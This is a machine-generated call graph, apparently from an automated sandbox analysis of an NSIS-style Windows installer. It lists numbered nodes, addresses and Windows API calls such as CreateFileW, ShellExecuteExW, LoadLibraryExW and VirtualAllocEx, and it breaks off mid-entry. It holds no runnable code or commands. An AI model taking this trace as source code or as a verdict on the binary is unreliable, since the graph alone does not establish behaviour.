GetProcAddress 4100->4101 4102 4068d9 4100->4102 4103 4037eb 4101->4103 4104 406179 3 API calls 4102->4104 4103->4018 4105 4068df 4104->4105 4105->4101 4105->4103 4106->4024 4107->4026 4109 406d18 5 API calls 4108->4109 4110 403c8c 4109->4110 4111 403c96 4110->4111 4256 406531 lstrlenW CharPrevW 4110->4256 4111->4031 4114 405df9 2 API calls 4115 403ca4 4114->4115 4259 406a31 4115->4259 4263 4068f6 GetFileAttributesW CreateFileW 4118->4263 4120 40340a 4121 403417 4120->4121 4264 406af5 lstrcpynW 4120->4264 4121->4037 4123 40342d 4265 406ceb lstrlenW 4123->4265 4127 40343e GetFileSize 4128 403457 4127->4128 4142 403545 4127->4142 4128->4121 4131 40311b ReadFile 4128->4131 4133 403613 4128->4133 4140 403364 6 API calls 4128->4140 4128->4142 4130 403554 4130->4121 4132 403595 GlobalAlloc 4130->4132 4282 403131 SetFilePointer 4130->4282 4131->4128 4281 403131 SetFilePointer 4132->4281 4135 403364 6 API calls 4133->4135 4135->4121 4137 403571 4139 406923 ReadFile 4137->4139 4138 4035b2 4141 403148 35 API calls 4138->4141 4143 403583 4139->4143 4140->4128 4144 4035c1 4141->4144 4270 403364 4142->4270 4143->4121 4143->4132 4144->4121 4144->4144 4145 4035f1 SetFilePointer 4144->4145 4145->4121 4147 4068c1 5 API calls 4146->4147 4148 405a2d 4147->4148 4149 405a36 4148->4149 4150 405a48 4148->4150 4295 4065fa wsprintfW 4149->4295 4151 406952 3 API calls 4150->4151 4153 405a77 4151->4153 4154 405a96 lstrcatW 4153->4154 4156 406952 3 API calls 4153->4156 4155 405a46 4154->4155 4287 40595a 4155->4287 4156->4154 4159 406613 18 API calls 4160 405ac8 4159->4160 4161 405b62 4160->4161 4163 406952 3 API calls 4160->4163 4162 406613 18 API calls 4161->4162 4164 405b68 4162->4164 4165 405afb 4163->4165 4166 405b78 LoadImageW 4164->4166 4167 405e95 17 API calls 4164->4167 4165->4161 4170 405b1f lstrlenW 4165->4170 4174 4065d1 CharNextW 4165->4174 4168 405c25 4166->4168 4169 405ba8 RegisterClassW 4166->4169 4167->4166 4173 401533 94 API calls 4168->4173 4171 405bd5 4169->4171 4172 405bdc SystemParametersInfoW CreateWindowExW 4169->4172 4175 405b55 4170->4175 4176 405b2f lstrcmpiW 4170->4176 4171->4040 4172->4168 4177 405c2b 4173->4177 4178 405b1a 4174->4178 4180 406531 3 API calls 4175->4180 4176->4175 4179 405b3f GetFileAttributesW 4176->4179 4177->4171 4183 40595a 18 API calls 4177->4183 4178->4170 4182 405b4b 4179->4182 4181 405b5b 4180->4181 4296 406af5 lstrcpynW 4181->4296 4182->4175 4186 406ceb 2 API calls 4182->4186 4184 405c38 4183->4184 4187 405c44 ShowWindow 4184->4187 4188 405cc6 4184->4188 4186->4175 4189 406179 3 API calls 4187->4189 4297 40583f OleInitialize 4188->4297 4191 405c5c 4189->4191 4195 405c6a GetClassInfoW 4191->4195 4196 406179 3 API calls 4191->4196 4192 405ccc 4193 405cd0 4192->4193 4194 405cea 4192->4194 4193->4171 4200 401533 94 API calls 4193->4200 4197 401533 94 API calls 4194->4197 4198 405c93 DialogBoxParamW 4195->4198 4199 405c7d GetClassInfoW RegisterClassW 4195->4199 4196->4195 4201 405cf1 4197->4201 4202 401533 94 API calls 4198->4202 4199->4198 4200->4171 4201->4201 4203 405cbb 4202->4203 4203->4171 4204->4029 4447 406af5 lstrcpynW 4205->4447 4207 406624 4208 406ba0 4 API calls 4207->4208 4209 40662a 4208->4209 4210 403a61 4209->4210 4211 406d18 5 API calls 4209->4211 4210->4040 4220 406af5 lstrcpynW 4210->4220 4216 406636 4211->4216 4212 406666 lstrlenW 4213 406672 4212->4213 4212->4216 4215 406531 3 API calls 4213->4215 4214 4065aa 2 API calls 4214->4216 4217 406677 GetFileAttributesW 4215->4217 4216->4210 4216->4212 4216->4214 4219 406ceb 2 API calls 4216->4219 4217->4210 4218 406683 4217->4218 4218->4210 4219->4212 4220->4073 4221->4082 4223 4068c1 5 API calls 4222->4223 4224 403a99 lstrcatW 4223->4224 4224->4068 4224->4069 4226 405e64 GetLastError 4225->4226 4227 403af2 4225->4227 4226->4227 4228 405e71 SetFileSecurityW 4226->4228 4227->4081 4228->4227 4229 405e8b GetLastError 4228->4229 4229->4227 4231 405e13 4230->4231 4232 405e0b GetLastError 4230->4232 4231->4081 4232->4231 4233->4083 4234->4094 4236 406239 4235->4236 4237 40622c 4235->4237 4236->4094 4448 4062e1 4237->4448 4240 4066f0 4239->4240 4241 4066e4 CloseHandle 4239->4241 4240->4094 4241->4240 4243 4036c5 4242->4243 4244 4036b7 CloseHandle 4242->4244 4481 403cee 4243->4481 4244->4243 4250 406a98 4249->4250 4251 406ae6 4250->4251 4252 406aae MessageBoxIndirectW 4250->4252 4251->4054 4252->4251 4254 401399 94 API calls 4253->4254 4255 401547 4254->4255 4255->4054 4257 403c9e 4256->4257 4258 40654e lstrcatW 4256->4258 4257->4114 4258->4257 4260 406a3e GetTickCount GetTempFileNameW 4259->4260 4261 406a72 4260->4261 4262 403caf 4260->4262 4261->4260 4261->4262 4262->4031 4263->4120 4264->4123 4266 406cfa 4265->4266 4267 406d00 CharPrevW 4266->4267 4268 403433 4266->4268 4267->4266 4267->4268 4269 406af5 lstrcpynW 4268->4269 4269->4127 4271 403383 4270->4271 4272 40336b 4270->4272 4275 403394 GetTickCount 4271->4275 4276 40338c 4271->4276 4273 403374 DestroyWindow 4272->4273 4274 40337b 4272->4274 4273->4274 4274->4130 4278 4033a2 CreateDialogParamW ShowWindow 4275->4278 4279 4033c7 4275->4279 4283 4061ea 4276->4283 4278->4279 4279->4130 4281->4138 4282->4137 4284 4061fc PeekMessageW 4283->4284 4285 4061f2 DispatchMessageW 4284->4285 4286 403393 4284->4286 4285->4284 4286->4130 4288 40596d 4287->4288 4304 4065fa wsprintfW 4288->4304 4290 4059e6 4305 405cf6 4290->4305 4292 405a14 4292->4159 4293 4059eb 4293->4292 4294 405e95 17 API calls 4293->4294 4294->4293 4295->4155 4296->4161 4308 4054c3 4297->4308 4299 405889 4300 4054c3 SendMessageW 4299->4300 4301 40589b OleUninitialize 4300->4301 4301->4192 4303 405862 4303->4299 4311 401399 4303->4311 4304->4290 4306 405e95 17 API calls 4305->4306 4307 405d04 SetWindowTextW 4306->4307 4307->4293 4309 4054db 4308->4309 4310 4054cc SendMessageW 4308->4310 4309->4303 4310->4309 4312 401413 4311->4312 4314 4013a3 4311->4314 4312->4303 4314->4312 4315 4013df MulDiv SendMessageW 4314->4315 4316 40154a 4314->4316 4315->4314 4317 4015c3 4316->4317 4320 4015ce 4316->4320 4318 4016c1 4317->4318 4319 4017c2 4317->4319 4317->4320 4321 4015e6 4317->4321 4322 4018cb 4317->4322 4323 40160c 4317->4323 4324 4016ef 4317->4324 4325 4016af 4317->4325 4326 40182f 4317->4326 4327 401711 4317->4327 4328 401633 SetForegroundWindow 4317->4328 4329 4017d3 4317->4329 4330 4015d5 4317->4330 4331 401618 4317->4331 4332 4015f9 4317->4332 4333 40189b 4317->4333 4334 4018de 4317->4334 4335 40163f 4317->4335 4343 4016d1 ShowWindow 4318->4343 4344 4016d9 4318->4344 4347 40303e 17 API calls 4319->4347 4320->4314 4321->4320 4346 4015f0 PostQuitMessage 4321->4346 4338 40303e 17 API calls 4322->4338 4353 405d15 24 API calls 4323->4353 4345 40303e 17 API calls 4324->4345 4437 4065fa wsprintfW 4325->4437 4341 40303e 17 API calls 4326->4341 4348 40303e 17 API calls 4327->4348 4328->4320 4337 40303e 17 API calls 4329->4337 4330->4320 4358 405d15 24 API calls 4330->4358 4339 403002 17 API calls 4331->4339 4363 401399 77 API calls 4332->4363 4336 40303e 17 API calls 4333->4336 4340 40303e 17 API calls 4334->4340 4335->4320 4366 403002 17 API calls 4335->4366 4350 4018a2 SearchPathW 4336->4350 4351 4017da 4337->4351 4352 4018d2 4338->4352 4354 40161e Sleep 4339->4354 4355 4018e5 4340->4355 4356 401835 GetFullPathNameW 4341->4356 4343->4344 4344->4320 4357 4016e6 ShowWindow 4344->4357 4359 4016f6 SetFileAttributesW 4345->4359 4346->4320 4360 4017c8 4347->4360 4349 401718 4348->4349 4429 406ba0 CharNextW CharNextW 4349->4429 4350->4320 4364 40303e 17 API calls 4351->4364 4365 406a31 2 API calls 4352->4365 4353->4320 4354->4320 4371 401906 4355->4371 4372 40190e 4355->4372 4367 401857 4356->4367 4368 40184d 4356->4368 4357->4320 4358->4320 4359->4320 4438 4065aa FindFirstFileW 4360->4438 4363->4320 4369 4017e3 4364->4369 4365->4320 4366->4320 4367->4368 4379 4065aa 2 API calls 4367->4379 4368->4320 4373 401889 GetShortPathNameW 4368->4373 4370 40303e 17 API calls 4369->4370 4375 4017ec MoveFileW 4370->4375 4442 406af5 lstrcpynW 4371->4442 4443 406af5 lstrcpynW 4372->4443 4373->4320 4374 4065d1 CharNextW 4395 401720 4374->4395 4380 401804 4375->4380 4402 4017f8 4375->4402 4378 401790 4383 405d15 24 API calls 4378->4383 4384 40186a 4379->4384 4380->4320 4387 4065aa 2 API calls 4380->4387 4381 40190c 4390 406d18 5 API calls 4381->4390 4382 401919 4385 406531 3 API calls 4382->4385 4386 401797 4383->4386 4384->4368 4441 406af5 lstrcpynW 4384->4441 4389 40191f lstrcatW 4385->4389 4435 406af5 lstrcpynW 4386->4435 4396 401814 4387->4396 4388 405df9 2 API calls 4388->4395 4389->4381 4424 40192b 4390->4424 4393 4064d7 5 API calls 4393->4395 4394 4017a2 SetCurrentDirectoryW 4394->4320 4395->4374 4395->4388 4395->4393 4397 401750 4395->4397 4399 401769 GetFileAttributesW 4395->4399 4400 401780 4395->4400 4396->4320 4398 406218 35 API calls 4396->4398 4397->4395 4401 405e19 4 API calls 4397->4401 4398->4402 4399->4395 4400->4323 4400->4378 4401->4397 4402->4323 4403 4065aa 2 API calls 4403->4424 4404 401968 4444 406b78 GetFileAttributesW 4404->4444 4407 40193f CompareFileTime 4407->4424 4408 401a18 4410 405d15 24 API calls 4408->4410 4409 4019fd 4411 405d15 24 API calls 4409->4411 4412 401a24 4410->4412 4411->4320 4413 403148 35 API calls 4412->4413 4414 401a3a 4413->4414 4415 401a52 SetFileTime 4414->4415 4417 401a60 CloseHandle 4414->4417 4415->4417 4416 405e95 17 API calls 4416->4424 4417->4320 4418 401a73 4417->4418 4420 401a78 4418->4420 4421 401a89 4418->4421 4419 406af5 lstrcpynW 4419->4424 4422 405e95 17 API calls 4420->4422 4423 405e95 17 API calls 4421->4423 4425 401a80 lstrcatW 4422->4425 4426 401a91 4423->4426 4424->4330 4424->4403 4424->4404 4424->4407 4424->4408 4424->4409 4424->4416 4424->4419 4427 406a83 MessageBoxIndirectW 4424->4427 4436 4068f6 GetFileAttributesW CreateFileW 4424->4436 4425->4426 4428 406a83 MessageBoxIndirectW 4426->4428 4427->4424 4428->4320 4430 406bbe 4429->4430 4431 406bf5 4429->4431 4432 406bcd CharNextW 4430->4432 4433 406bd2 4430->4433 4431->4395 4432->4431 4433->4431 4434 4065d1 CharNextW 4433->4434 4434->4433 4435->4394 4436->4424 4437->4320 4439 4065c0 FindClose 4438->4439 4440 4065cb 4438->4440 4439->4440 4440->4320 4441->4368 4442->4381 4443->4382 4445 406b9a 4444->4445 4446 406b8a SetFileAttributesW 4444->4446 4445->4424 4446->4445 4447->4207 4449 406311 4448->4449 4450 406337 GetShortPathNameW 4448->4450 4475 4068f6 GetFileAttributesW CreateFileW 4449->4475 4452 406417 4450->4452 4453 40634c 4450->4453 4452->4236 4453->4452 4454 406354 wsprintfA 4453->4454 4456 405e95 17 API calls 4454->4456 4455 40631b CloseHandle GetShortPathNameW 4455->4452 4457 40632f 4455->4457 4458 40637d 4456->4458 4457->4450 4457->4452 4476 4068f6 GetFileAttributesW CreateFileW 4458->4476 4460 40638a 4460->4452 4461 406395 GetFileSize GlobalAlloc 4460->4461 4462 406410 CloseHandle 4461->4462 4463 4063b4 4461->4463 4462->4452 4464 406923 ReadFile 4463->4464 4465 4063bc 4464->4465 4465->4462 4477 406b11 lstrlenA lstrlenA 4465->4477 4468 40641c 4470 406b11 3 API calls 4468->4470 4469 4063cf lstrcpyA 4472 4063e1 4469->4472 4470->4472 4471 4063f2 SetFilePointer 4473 4069e6 WriteFile 4471->4473 4472->4471 4474 406409 GlobalFree 4473->4474 4474->4462 4475->4455 4476->4460 4478 4063cb 4477->4478 4479 406b30 4477->4479 4478->4468 4478->4469 4479->4478 4480 406b5d lstrlenA 4479->4480 4480->4478 4480->4479 4482 403cfc 4481->4482 4483 4036ca 4482->4483 4484 403d01 FreeLibrary GlobalFree 4482->4484 4485 4066f4 4483->4485 4484->4483 4484->4484 4486 406613 18 API calls 4485->4486 4487 406716 4486->4487 4488 406736 4487->4488 4489 40671f DeleteFileW 4487->4489 4490 4036d6 OleUninitialize 4488->4490 4492 406856 4488->4492 4524 406af5 lstrcpynW 4488->4524 4489->4490 4490->4050 4490->4051 4492->4490 4496 4065aa 2 API calls 4492->4496 4493 40675e 4494 406776 4493->4494 4495 406768 lstrcatW 4493->4495 4498 406ceb 2 API calls 4494->4498 4497 40677c 4495->4497 4499 406873 4496->4499 4500 40678d lstrcatW 4497->4500 4503 406795 lstrlenW FindFirstFileW 4497->4503 4498->4497 4499->4490 4501 406877 4499->4501 4500->4503 4502 406531 3 API calls 4501->4502 4504 40687d 4502->4504 4503->4492 4511 4067be 4503->4511 4505 406560 5 API calls 4504->4505 4506 406889 4505->4506 4508 4068ac 4506->4508 4509 40688d 4506->4509 4507 406838 FindNextFileW 4507->4511 4512 40684f FindClose 4507->4512 4513 405d15 24 API calls 4508->4513 4509->4490 4514 405d15 24 API calls 4509->4514 4511->4507 4518 4066f4 59 API calls 4511->4518 4520 406804 4511->4520 4525 406af5 lstrcpynW 4511->4525 4512->4492 4513->4490 4515 406899 4514->4515 4517 406218 35 API calls 4515->4517 4519 4068a2 4517->4519 4518->4520 4519->4490 4520->4507 4521 405d15 24 API calls 4520->4521 4522 405d15 24 API calls 4520->4522 4523 406218 35 API calls 4520->4523 4526 406560 4520->4526 4521->4507 4522->4520 4523->4520 4524->4493 4525->4511 4527 406b78 2 API calls 4526->4527 4528 40656c 4527->4528 4529 40658e 4528->4529 4530 406584 DeleteFileW 4528->4530 4531 40657c RemoveDirectoryW 4528->4531 4529->4520 4532 40658a 4530->4532 4531->4532 4532->4529 4533 406599 SetFileAttributesW 4532->4533 4533->4529 4713 40225d 4714 402335 4713->4714 4715 40226e 4713->4715 4718 405d15 24 API calls 4714->4718 4716 40303e 17 API calls 4715->4716 4717 402275 4716->4717 4719 40303e 17 API calls 4717->4719 4725 40234a 4718->4725 4720 402281 4719->4720 4721 40228b GetModuleHandleW 4720->4721 4722 40229c LoadLibraryExW 4720->4722 4723 4022b0 4721->4723 4724 402298 4721->4724 4722->4714 4722->4723 4734 406244 4723->4734 4724->4722 4728 4022c4 4731 405d15 24 API calls 4728->4731 4732 4022da 4728->4732 4729 402306 4730 405d15 24 API calls 4729->4730 4730->4732 4731->4732 4732->4725 4733 402329 FreeLibrary 4732->4733 4733->4725 4739 406444 WideCharToMultiByte 4734->4739 4736 406261 4737 406268 GetProcAddress 4736->4737 4738 4022ba 4736->4738 4737->4738 4738->4728 4738->4729 4739->4736 4914 402cde 4915 403002 17 API calls 4914->4915 4916 402b21 4915->4916 4916->4914 4917 402d10 4916->4917 4922 401709 4916->4922 4918 402d35 4917->4918 4919 402d25 4917->4919 4921 405e95 17 API calls 4918->4921 4920 403002 17 API calls 4919->4920 4920->4922 4921->4922 4923 40285f 4924 402883 4923->4924 4925 402899 4923->4925 4928 403002 17 API calls 4924->4928 4926 4028c3 4925->4926 4927 40289e 4925->4927 4930 40303e 17 API calls 4926->4930 4929 40303e 17 API calls 4927->4929 4937 402889 4928->4937 4931 4028a5 4929->4931 4932 4028ca lstrlenW 4930->4932 4940 406444 WideCharToMultiByte 4931->4940 4932->4937 4934 4028b5 lstrlenA 4934->4937 4935 4028fc 4936 4069e6 WriteFile 4935->4936 4939 402910 4935->4939 4936->4939 4937->4935 4938 40645f 5 API calls 4937->4938 4937->4939 4938->4935 4940->4934 4941 404060 4942 404087 4941->4942 4943 40409d 4941->4943 5002 406a15 GetDlgItemTextW 4942->5002 4945 4040a7 GetDlgItem 4943->4945 4952 40411a 4943->4952 4948 4040bf 4945->4948 4946 404139 4953 404098 4946->4953 5004 406a15 GetDlgItemTextW 4946->5004 4947 404092 4949 406d18 5 API calls 4947->4949 4950 4040d3 SetWindowTextW 4948->4950 4954 406ba0 4 API calls 4948->4954 4949->4953 4955 4054f5 18 API calls 4950->4955 4952->4946 4957 405e95 17 API calls 4952->4957 4962 405736 8 API calls 4953->4962 4958 4040c9 4954->4958 4959 4040f0 4955->4959 4956 404230 4960 406613 18 API calls 4956->4960 4961 404195 SHBrowseForFolderW 4957->4961 4958->4950 4967 406531 3 API calls 4958->4967 4963 4054f5 18 API calls 4959->4963 4964 404236 4960->4964 4961->4946 4965 4041b0 CoTaskMemFree 4961->4965 4966 4043f1 4962->4966 4968 4040fb 4963->4968 5005 406af5 lstrcpynW 4964->5005 4970 406531 3 API calls 4965->4970 4967->4950 5003 4054de SendMessageW 4968->5003 4977 4041bd 4970->4977 4972 404250 4974 4068c1 5 API calls 4972->4974 4973 404101 4976 4068c1 5 API calls 4973->4976 4985 404256 4974->4985 4975 4041fa SetDlgItemTextW 4975->4946 4976->4953 4977->4975 4979 405e95 17 API calls 4977->4979 4978 4042ab 5006 406af5 lstrcpynW 4978->5006 4981 4041db lstrcmpiW 4979->4981 4981->4975 4982 4041ef lstrcatW 4981->4982 4982->4975 4983 4042b7 4984 406ba0 4 API calls 4983->4984 4986 4042bd GetDiskFreeSpaceW 4984->4986 4985->4978 4988 406ceb 2 API calls 4985->4988 4990 404305 4985->4990 4989 4042e5 MulDiv 4986->4989 4986->4990 4988->4985 4989->4990 4991 40437c 4990->4991 5007 40553b 4990->5007 4992 4043a4 EnableWindow 4991->4992 4994 401533 94 API calls 4991->4994 4992->4953 4995 4043cd 4992->4995 4997 4043a2 4994->4997 4995->4953 5015 405517 SendMessageW 4995->5015 4996 404364 4998 404368 4996->4998 4999 40437e SetDlgItemTextW 4996->4999 4997->4992 5001 40553b 20 API calls 4998->5001 4999->4991 5001->4991 5002->4947 5003->4973 5004->4956 5005->4972 5006->4983 5008 405550 5007->5008 5009 405e95 17 API calls 5008->5009 5010 4055d9 5009->5010 5011 405e95 17 API calls 5010->5011 5012 4055e5 5011->5012 5013 405e95 17 API calls 5012->5013 5014 4055f1 lstrlenW wsprintfW SetDlgItemTextW 5013->5014 5014->4996 5015->4953 5016 401ce0 5017 40303e 17 API calls 5016->5017 5018 401ce7 5017->5018 5019 403002 17 API calls 5018->5019 5020 401cf0 wsprintfW 5019->5020 5021 402ea1 5020->5021 5022 403d65 5023 403e9f 5022->5023 5024 403d7a 5022->5024 5025 403f20 5023->5025 5026 403ead 5023->5026 5027 4054f5 18 API calls 5024->5027 5028 403f1b 5025->5028 5029 403f2b GetDlgItem 5025->5029 5026->5028 5034 403eda GetDlgItem SendMessageW EnableWindow 5026->5034 5031 403de9 5027->5031 5030 405736 8 API calls 5028->5030 5032 403f4d 5029->5032 5033 403fee 5029->5033 5035 404033 5030->5035 5036 4054f5 18 API calls 5031->5036 5032->5028 5039 403f7d SendMessageW LoadCursorW SetCursor 5032->5039 5033->5028 5040 403fff 5033->5040 5051 405517 SendMessageW 5034->5051 5038 403df8 CheckDlgButton EnableWindow GetDlgItem 5036->5038 5050 4054de SendMessageW 5038->5050 5052 4069ce ShellExecuteExW 5039->5052 5043 404007 SendMessageW 5040->5043 5044 40401e 5040->5044 5043->5044 5044->5035 5047 404023 SendMessageW 5044->5047 5045 403e2b SendMessageW 5048 403e50 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5045->5048 5049 403e47 GetSysColor 5045->5049 5046 403fe0 LoadCursorW SetCursor 5046->5033 5047->5035 5048->5035 5049->5048 5050->5045 5051->5028 5052->5046 5053 402566 5054 402574 5053->5054 5055 40256e 5053->5055 5057 402585 5054->5057 5058 40303e 17 API calls 5054->5058 5056 40303e 17 API calls 5055->5056 5056->5054 5059 40303e 17 API calls 5057->5059 5061 402594 5057->5061 5058->5057 5059->5061 5060 40303e 17 API calls 5062 40259d WritePrivateProfileStringW 5060->5062 5061->5060 5063 405667 lstrlenW WideCharToMultiByte 5064 402d69 5065 403002 17 API calls 5064->5065 5066 402d6f 5065->5066 5067 405e95 17 API calls 5066->5067 5068 401709 5066->5068 5067->5068 5069 6fc32c6a 5070 6fc32cc3 5069->5070 5071 6fc32cd8 5070->5071 5072 6fc32ccd GetLastError 5070->5072 5072->5071 5073 401eea 5074 401ef4 5073->5074 5075 401efe GetDlgItem 5073->5075 5076 403002 17 API calls 5074->5076 5077 401efb 5075->5077 5076->5077 5078 401f3c GetClientRect LoadImageW SendMessageW 5077->5078 5079 40303e 17 API calls 5077->5079 5081 401f9c 5078->5081 5083 401fa7 5078->5083 5079->5078 5082 401fa0 DeleteObject 5081->5082 5081->5083 5082->5083 5084 401aec 5085 401aa2 5084->5085 5089 401ab1 5084->5089 5086 40303e 17 API calls 5085->5086 5087 401aa7 5086->5087 5088 4066f4 66 API calls 5087->5088 5088->5089 5090 40216c 5091 40303e 17 API calls 5090->5091 5092 402173 5091->5092 5093 4065aa 2 API calls 5092->5093 5094 402179 5093->5094 5096 402188 5094->5096 5097 4065fa wsprintfW 5094->5097 5097->5096 5098 404f6d 5099 404f8c 5098->5099 5100 40510e 5098->5100 5099->5100 5101 404f98 5099->5101 5102 405122 GetDlgItem GetDlgItem 5100->5102 5107 40515b 5100->5107 5104 404fb7 5101->5104 5105 404f9d SetWindowPos 5101->5105 5106 4054f5 18 API calls 5102->5106 5103 4051b2 5108 4054c3 SendMessageW 5103->5108 5113 405109 5103->5113 5109 40500a 5104->5109 5110 404fbc ShowWindow 5104->5110 5114 4050df 5105->5114 5111 405145 SetClassLongW 5106->5111 5107->5103 5112 401399 94 API calls 5107->5112 5137 4051c4 5108->5137 5116 405012 DestroyWindow 5109->5116 5117 40502c 5109->5117 5110->5114 5115 404fe1 GetWindowLongW 5110->5115 5118 401533 94 API calls 5111->5118 5119 40518b 5112->5119 5120 405736 8 API calls 5114->5120 5115->5114 5121 404ffd ShowWindow 5115->5121 5122 405443 5116->5122 5123 405031 SetWindowLongW 5117->5123 5124 405044 5117->5124 5118->5107 5119->5103 5126 40518f SendMessageW 5119->5126 5120->5113 5121->5114 5122->5113 5131 405476 ShowWindow 5122->5131 5123->5113 5124->5114 5125 405050 GetDlgItem 5124->5125 5129 40506c SendMessageW IsWindowEnabled 5125->5129 5130 40508b 5125->5130 5126->5113 5127 401533 94 API calls 5127->5137 5128 405445 DestroyWindow EndDialog 5128->5122 5129->5113 5129->5130 5133 40509e 5130->5133 5135 4050e1 SendMessageW 5130->5135 5136 4050b0 5130->5136 5143 405096 5130->5143 5131->5113 5132 405e95 17 API calls 5132->5137 5133->5135 5133->5143 5135->5114 5138 4050c7 5136->5138 5139 4050b9 5136->5139 5137->5113 5137->5127 5137->5128 5137->5132 5140 4054f5 18 API calls 5137->5140 5144 4054f5 18 API calls 5137->5144 5157 405385 DestroyWindow 5137->5157 5142 401533 94 API calls 5138->5142 5141 401533 94 API calls 5139->5141 5140->5137 5141->5143 5142->5143 5143->5114 5166 405933 5143->5166 5145 405248 GetDlgItem 5144->5145 5146 40526f ShowWindow EnableWindow EnableWindow EnableWindow 5145->5146 5150 405263 5145->5150 5146->5150 5147 4052c4 GetSystemMenu EnableMenuItem SendMessageW 5148 4052f1 SendMessageW 5147->5148 5147->5150 5148->5150 5150->5146 5150->5147 5151 405cf6 18 API calls 5150->5151 5169 4054de SendMessageW 5150->5169 5170 406af5 lstrcpynW 5150->5170 5151->5150 5153 405323 lstrlenW 5154 405e95 17 API calls 5153->5154 5155 40533d SetWindowTextW 5154->5155 5156 401399 94 API calls 5155->5156 5156->5137 5157->5122 5158 40539f CreateDialogParamW 5157->5158 5158->5122 5159 4053d2 5158->5159 5160 4054f5 18 API calls 5159->5160 5161 4053dd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5160->5161 5162 401399 94 API calls 5161->5162 5163 405423 5162->5163 5163->5113 5164 40542b ShowWindow 5163->5164 5165 4054c3 SendMessageW 5164->5165 5165->5122 5167 405940 SendMessageW 5166->5167 5168 40593a 5166->5168 5167->5114 5168->5167 5169->5150 5170->5153 5171 401af0 5172 40303e 17 API calls 5171->5172 5173 401af7 lstrlenW 5172->5173 5175 401afd 5173->5175 5174 40303e 17 API calls 5174->5175 5175->5174 5177 402855 5175->5177 5178 4068f6 GetFileAttributesW CreateFileW 5175->5178 5178->5175 3922 402af5 3923 402afc 3922->3923 3934 401709 3922->3934 3924 403002 17 API calls 3923->3924 3925 402b03 3924->3925 3926 402b10 SetFilePointer 3925->3926 3928 402b21 3926->3928 3926->3934 3927 403002 17 API calls 3927->3928 3928->3927 3929 402d10 3928->3929 3928->3934 3930 402d35 3929->3930 3931 402d25 3929->3931 3933 405e95 17 API calls 3930->3933 3932 403002 17 API calls 3931->3932 3932->3934 3933->3934 5179 402b75 5180 40303e 17 API calls 5179->5180 5181 402b7c FindFirstFileW 5180->5181 5182 402b90 5181->5182 5185 4065fa wsprintfW 5182->5185 5184 402b67 5185->5184 5186 402077 5187 40303e 17 API calls 5186->5187 5188 40207d 5187->5188 5189 40303e 17 API calls 5188->5189 5190 402086 5189->5190 5191 40303e 17 API calls 5190->5191 5192 40208f 5191->5192 5193 40303e 17 API calls 5192->5193 5194 402098 5193->5194 5195 405d15 24 API calls 5194->5195 5196 4020a4 5195->5196 5203 4069ce ShellExecuteExW 5196->5203 5198 4020ea 5199 4064ef 5 API calls 5198->5199 5200 401709 5198->5200 5201 402109 CloseHandle 5199->5201 5201->5200 5203->5198 4534 6fc3167a 4535 6fc316b7 4534->4535 4576 6fc32351 4535->4576 4537 6fc316be 4538 6fc317ef 4537->4538 4539 6fc316d6 4537->4539 4540 6fc316cf 4537->4540 4606 6fc32049 4539->4606 4622 6fc31fcb 4540->4622 4545 6fc31722 4635 6fc32209 4545->4635 4546 6fc31740 4549 6fc31791 4546->4549 4550 6fc31746 4546->4550 4547 6fc316eb 4552 6fc316f5 4547->4552 4557 6fc31702 4547->4557 4548 6fc3170a 4563 6fc31700 4548->4563 4632 6fc32f9f 4548->4632 4555 6fc32209 10 API calls 4549->4555 4654 6fc31f1e 4550->4654 4552->4563 4616 6fc32d14 4552->4616 4561 6fc3177e 4555->4561 4556 6fc31728 4646 6fc31668 4556->4646 4626 6fc317f7 4557->4626 4567 6fc317de 4561->4567 4659 6fc3200d 4561->4659 4563->4545 4563->4546 4564 6fc31708 4564->4563 4565 6fc32209 10 API calls 4565->4561 4567->4538 4569 6fc317e8 GlobalFree 4567->4569 4569->4538 4573 6fc317cf 4573->4567 4663 6fc315c5 wsprintfW 4573->4663 4575 6fc317c2 FreeLibrary 4575->4573 4666 6fc312f8 GlobalAlloc 4576->4666 4578 6fc3237f 4667 6fc312f8 GlobalAlloc 4578->4667 4580 6fc32a3a GlobalFree GlobalFree GlobalFree 4581 6fc32a5a 4580->4581 4597 6fc32aa7 4580->4597 4582 6fc32af7 4581->4582 4587 6fc32a73 4581->4587 4581->4597 4584 6fc32b19 GetModuleHandleW 4582->4584 4582->4597 4583 6fc32947 GlobalAlloc 4601 6fc3238a 4583->4601 4585 6fc32b2a LoadLibraryW 4584->4585 4586 6fc32b3f 4584->4586 4585->4586 4585->4597 4674 6fc31f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4586->4674 4593 6fc312e1 2 API calls 4587->4593 4587->4597 4589 6fc3299f lstrcpyW 4589->4601 4590 6fc329bd GlobalFree 4590->4601 4591 6fc32b8e 4592 6fc32b9c lstrlenW 4591->4592 4591->4597 4675 6fc31f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4592->4675 4593->4597 4594 6fc329af lstrcpyW 4594->4601 4595 6fc32b4c 4595->4591 4603 6fc32b78 GetProcAddress 4595->4603 4597->4537 4598 6fc32bb6 4598->4597 4600 6fc32822 GlobalFree 4600->4601 4601->4580 4601->4583 4601->4589 4601->4590 4601->4594 4601->4600 4605 6fc329fb 4601->4605 4668 6fc312f8 GlobalAlloc 4601->4668 4669 6fc312e1 4601->4669 4603->4591 4605->4601 4672 6fc31309 GlobalSize GlobalAlloc 4605->4672 4608 6fc3205e 4606->4608 4607 6fc312e1 lstrcpynW GlobalAlloc 4607->4608 4608->4607 4610 6fc32124 GlobalAlloc WideCharToMultiByte 4608->4610 4611 6fc32154 GlobalAlloc CLSIDFromString 4608->4611 4612 6fc321be GlobalFree 4608->4612 4615 6fc32179 4608->4615 4677 6fc31548 4608->4677 4610->4612 4611->4608 4612->4608 4613 6fc316dc 4612->4613 4613->4547 4613->4548 4613->4563 4615->4612 4682 6fc319db 4615->4682 4618 6fc32d26 4616->4618 4617 6fc32dcb VirtualAllocEx 4621 6fc32de9 4617->4621 4618->4617 4685 6fc32cbf 4621->4685 4623 6fc31fde 4622->4623 4624 6fc316d5 4623->4624 4625 6fc31fe9 GlobalAlloc 4623->4625 4624->4539 4625->4623 4630 6fc31823 4626->4630 4627 6fc31897 GlobalAlloc 4631 6fc318b5 4627->4631 4628 6fc318a8 4629 6fc318ac GlobalSize 4628->4629 4628->4631 4629->4631 4630->4627 4630->4628 4631->4564 4633 6fc32faa 4632->4633 4634 6fc32fea GlobalFree 4633->4634 4688 6fc312f8 GlobalAlloc 4635->4688 4637 6fc32280 MultiByteToWideChar 4642 